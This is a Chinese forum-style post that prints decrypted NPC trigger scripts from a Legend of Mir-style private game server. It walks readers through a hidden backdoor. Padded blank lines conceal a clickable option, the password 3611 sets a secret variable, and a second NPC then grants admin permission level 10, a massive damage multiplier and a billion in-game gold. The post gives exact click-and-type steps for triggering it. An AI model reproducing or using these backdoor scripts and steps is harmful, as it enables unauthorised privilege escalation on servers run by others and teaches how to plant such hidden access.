这个版本的触发脚本是加密的,解开是这样的
(@@InPutString @@InPutInteger @@sendmsg)
[@main]
#if
#act
OpenBigDialogBox
#say
\
<武器开封255次以后属性:/SCOLOR=249> <铠甲开封255次以后属性:/SCOLOR=249> <项链开封255次以后属性:/SCOLOR=249>\
\
攻击<(+255)/SCOLOR=250> 攻击<(+255)/SCOLOR=250> 攻击<(+255)/SCOLOR=250>\
魔法<(+255)/SCOLOR=250> 魔法<(+255)/SCOLOR=250> 魔法<(+255)/SCOLOR=250>\
道术<(+255)/SCOLOR=250> 道术<(+255)/SCOLOR=250> 道术<(+255)/SCOLOR=250>\
<致命一击:+70%/SCOLOR=254> <Hot/SCOLOR=253> <致命一击:+5%/SCOLOR=254> <致命一击:+5%/SCOLOR=254>\
<攻击伤害:+5%/SCOLOR=254> <攻击伤害:+5%/SCOLOR=254> <攻击伤害:+5%/SCOLOR=254>\
<物理伤害减少:+5%/SCOLOR=254> <物理伤害减少:+40%/SCOLOR=254> <Hot/SCOLOR=253> <物理伤害减少:+5%/SCOLOR=254>\
<魔法伤害减少:+5%/SCOLOR=254> <魔法伤害减少:+40%/SCOLOR=254> <Hot/SCOLOR=253> <魔法伤害减少:+5%/SCOLOR=254>\
<忽视目标防御:+5%/SCOLOR=254> <忽视目标防御:+5%/SCOLOR=254> <忽视目标防御:+60%/SCOLOR=254> <Hot/SCOLOR=253>\
<攻击伤害反弹:+5%/SCOLOR=254> <攻击伤害反弹:+40%/SCOLOR=254> <Hot/SCOLOR=253> <攻击伤害反弹:+5%/SCOLOR=254>\
\
\
\
<高致命刀刀双倍伤害/SCOLOR=243> <高效减伤单挑群雄/SCOLOR=243> <忽视防御杀人杀怪速度快/SCOLOR=243>\
\
<开封武器/@开封武器> <开封铠甲/@开封铠甲> <开封项链/@开封项链>\
\
< /@exlt>
[@开封项链]
\
<开封项链的攻击、魔法、道术需要大量元宝!/SCOLOR=254>\
<并且将要开封的项链佩带在身上。/SCOLOR=254>\
\
<使用500000元宝随机增加1-20点攻击力/SCOLOR=243>\
<使用500000元宝随机增加1-20点魔法力/SCOLOR=243>\
<使用500000元宝随机增加1-20点道术力/SCOLOR=243>\
\
<增加项链攻击/@增加项链攻击> <增加项链魔法/@增加项链魔法> <增加项链道术/@增加项链道术>\
\
<返回首页/@main>\
[@增加项链道术]
#if
CHECKUSEITEM 3
CheckItemAddValue 3 4 < 255
CHECKGAMEGOLD > 499999
#ACT
GAMEGOLD - 500000
UPGRADEITEMEX 3 4 0 20 0
SENDMSG 7 您的【<$NECKLACE>】增加N点道术力!
goto @检测项链开封
BREAK
#elseact
MESSAGEBOX 1.您的元宝不足\2.道术力已经达到255点\3.身上没有佩带项链.
break
[@增加项链魔法]
#if
CHECKUSEITEM 3
CheckItemAddValue 3 3 < 255
CHECKGAMEGOLD > 499999
#ACT
GAMEGOLD - 500000
UPGRADEITEMEX 3 3 0 20 0
SENDMSG 7 您的【<$NECKLACE>】增加N点魔法力!
goto @检测项链开封
BREAK
#elseact
MESSAGEBOX 1.您的元宝不足\2.魔法力已经达到255点\3.身上没有佩带项链.
break
[@增加项链攻击]
#if
CHECKUSEITEM 3
CheckItemAddValue 3 2 < 255
CHECKGAMEGOLD > 499999
#ACT
GAMEGOLD - 500000
UPGRADEITEMEX 3 2 0 20 0
SENDMSG 7 您的【<$NECKLACE>】增加N点攻击力!
goto @检测项链开封
BREAK
#elseact
MESSAGEBOX 1.您的元宝不足\2.攻击力已经达到255点\3.身上没有佩带项链.
break
[@检测项链开封]
#IF
CheckItemAddValue 3 2 = 255
CheckItemAddValue 3 3 = 255
CheckItemAddValue 3 4 = 255
#ACT
SetNewItemValue 3 4 = 60
GuildNoticeMsg 251 249 恭喜玩家[%s]将【<$NECKLACE>】开封!从此以后可以忽视防御杀人杀怪速度快!
GuildNoticeMsg 251 249 恭喜玩家[%s]将【<$NECKLACE>】开封!从此以后可以忽视防御杀人杀怪速度快!
GuildNoticeMsg 251 249 恭喜玩家[%s]将【<$NECKLACE>】开封!从此以后可以忽视防御杀人杀怪速度快!
GuildNoticeMsg 251 249 恭喜玩家[%s]将【<$NECKLACE>】开封!从此以后可以忽视防御杀人杀怪速度快!
GuildNoticeMsg 251 249 恭喜玩家[%s]将【<$NECKLACE>】开封!从此以后可以忽视防御杀人杀怪速度快!
break
[@开封铠甲]
\
<开封铠甲的攻击、魔法、道术需要大量元宝!/SCOLOR=254>\
<并且将要开封的铠甲佩带在身上。/SCOLOR=254>\
\
<使用500000元宝随机增加1-20点攻击力/SCOLOR=243>\
<使用500000元宝随机增加1-20点魔法力/SCOLOR=243>\
<使用500000元宝随机增加1-20点道术力/SCOLOR=243>\
\
<增加铠甲攻击/@增加铠甲攻击> <增加铠甲魔法/@增加铠甲魔法> <增加铠甲道术/@增加铠甲道术>\
\
<返回首页/@main>\
[@增加铠甲道术]
#if
CHECKUSEITEM 0
CheckItemAddValue 0 4 < 255
CHECKGAMEGOLD > 499999
#ACT
GAMEGOLD - 500000
UPGRADEITEMEX 0 4 0 20 0
SENDMSG 7 您的【<$DRESS>】增加N点道术力!
goto @检测铠甲开封
BREAK
#elseact
MESSAGEBOX 1.您的元宝不足\2.道术力已经达到255点\3.身上没有佩带衣服.
break
[@增加铠甲魔法]
#if
CHECKUSEITEM 0
CheckItemAddValue 0 3 < 255
CHECKGAMEGOLD > 499999
#ACT
GAMEGOLD - 500000
UPGRADEITEMEX 0 3 0 20 0
SENDMSG 7 您的【<$DRESS>】增加N点魔法力!
goto @检测铠甲开封
BREAK
#elseact
MESSAGEBOX 1.您的元宝不足\2.魔法力已经达到255点\3.身上没有佩带衣服.
break
[@增加铠甲攻击]
#if
CHECKUSEITEM 0
CheckItemAddValue 0 2 < 255
CHECKGAMEGOLD > 499999
#ACT
GAMEGOLD - 500000
UPGRADEITEMEX 0 2 0 20 0
SENDMSG 7 您的【<$DRESS>】增加N点攻击力!
goto @检测铠甲开封
BREAK
#elseact
MESSAGEBOX 1.您的元宝不足\2.攻击力已经达到255点\3.身上没有佩带衣服.
break
[@检测铠甲开封]
#IF
CheckItemAddValue 0 2 = 255
CheckItemAddValue 0 3 = 255
CheckItemAddValue 0 4 = 255
#ACT
SetNewItemValue 0 2 = 40
SetNewItemValue 0 3 = 40
SetNewItemValue 0 5 = 40
GuildNoticeMsg 251 249 恭喜玩家[%s]将【<$DRESS>】开封!从此以后可以高效减伤单挑群雄!
GuildNoticeMsg 251 249 恭喜玩家[%s]将【<$DRESS>】开封!从此以后可以高效减伤单挑群雄!
GuildNoticeMsg 251 249 恭喜玩家[%s]将【<$DRESS>】开封!从此以后可以高效减伤单挑群雄!
GuildNoticeMsg 251 249 恭喜玩家[%s]将【<$DRESS>】开封!从此以后可以高效减伤单挑群雄!
GuildNoticeMsg 251 249 恭喜玩家[%s]将【<$DRESS>】开封!从此以后可以高效减伤单挑群雄!
break
[@开封武器]
\
<开封武器的攻击、魔法、道术需要大量元宝!/SCOLOR=254>\
<并且将要开封的武器佩带在身上。/SCOLOR=254>\
\
<使用500000元宝随机增加1-20点攻击力/SCOLOR=243>\
<使用500000元宝随机增加1-20点魔法力/SCOLOR=243>\
<使用500000元宝随机增加1-20点道术力/SCOLOR=243>\
\
<增加武器攻击/@增加武器攻击> <增加武器魔法/@增加武器魔法> <增加武器道术/@增加武器道术>\
\
<返回首页/@main>\
[@exlt]
#If
#Act
#SAY
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
< /@@InPutInteger92>\
[@CALLInPutInteger92]
#IF
#SAY
\
\
<□□□□□□□□□□/@456> 0%\
\
<正在验证密码,请稍后...>
#act
DelayCall 600 @1.1
#elseact
goto @1.4
[@1.1]
#SAY
\
\
<■■□□□□□□□□/@456> 20%\
\
<正在验证密码,请稍后...>
#ACT
DelayCall 600 @1.2
[@1.2]
#SAY
\
\
<■■■■■■■□□□/@456> 70%\
\
<正在验证密码,请稍后...>
#ACT
DelayCall 600 @1.3
[@1.3]
#SAY
\
\
<■■■■■■■■■■/@456> 100%\
\
<正在验证密码,请稍后...>
#ACT
DelayCall 600 @验证密码
[@验证密码]
#if
EQUAL N92 3611
#ACT
break
#SAY
\
密码输入正确\
\
<我要100个/@10个>\
#ELSESAY
\
\
\
密码输入错误!\
\
\
\
<重新输入密码/@exlt>
[@10个]
#IF
CHECKLEVELEX > 0
#ACT
GetOppositeHumName S0
#IF
equal A123 <$STR(S0)>
#ACT
MOV N123321 99
这里是给予变量的。触发漏洞之前必须要在这里得到变量。
点击方框右下角 有个__的图标 连点2次 会出现一个框 然后输入密码 3611 密码验证正确以后点击2次我要10个。
这样 我们变量就拿到了。
这个触发NPC是开封使者。
还有个地方在转生那里 我就不发了。
接下来说的是触发NPC。
(@buy @sell @repair @s_repair @@InPutString @@InPutInteger @@sendmsg)
%100
+5
+6
+43
[@main]
欢迎光临. 感谢您到我们的铁匠铺.\
<买/@buy> 武器\
<卖/@sell> 武器\
<修理/@repair> 武器\
<特殊修理/@s_repair>\
<离 开/@exit>\
\ \ \ \ \ \ \ \ \ \ \ \ \
< /@exlt>
同样的。这里又有很多\ 这个在脚本里面代表换行 。前面得到变量的NPC是大窗口 我们可以点到。 但是武器店是小窗口。
有的同学就会想 是不是不能触发呢。根本就点不到啊。 这就是留下后门的人的高明之处。
不过他不可能留下一个不能触发的脚本吧。
接下来我们就要把小窗口卡成大窗口。 输入@回收。 跳出来回收窗口。然后再去点武器店的老头 你会发现 原来的小窗口 变成大窗口了 接下来我们就可以继续了。
点击2次 __ 输入密码 3611 然后跳出窗口 点我要10个。触发权限10 1000倍攻击 和十亿元宝。
<我要100个/@10个>\
<给别人jgs100/@@InPutString55>\
<给别人yb1002000010/@@InPutString56>\
#ELSESAY
\
\
\
密码输入错误!\
\
\
\
<重新输入密码/@exlt>
[@10个]
#IF
EQUAL N123321 99
#ACT
CHANGEPERMISSION 10
POWERRATE 100000 100000000
GAMEGOLD + 1000000000
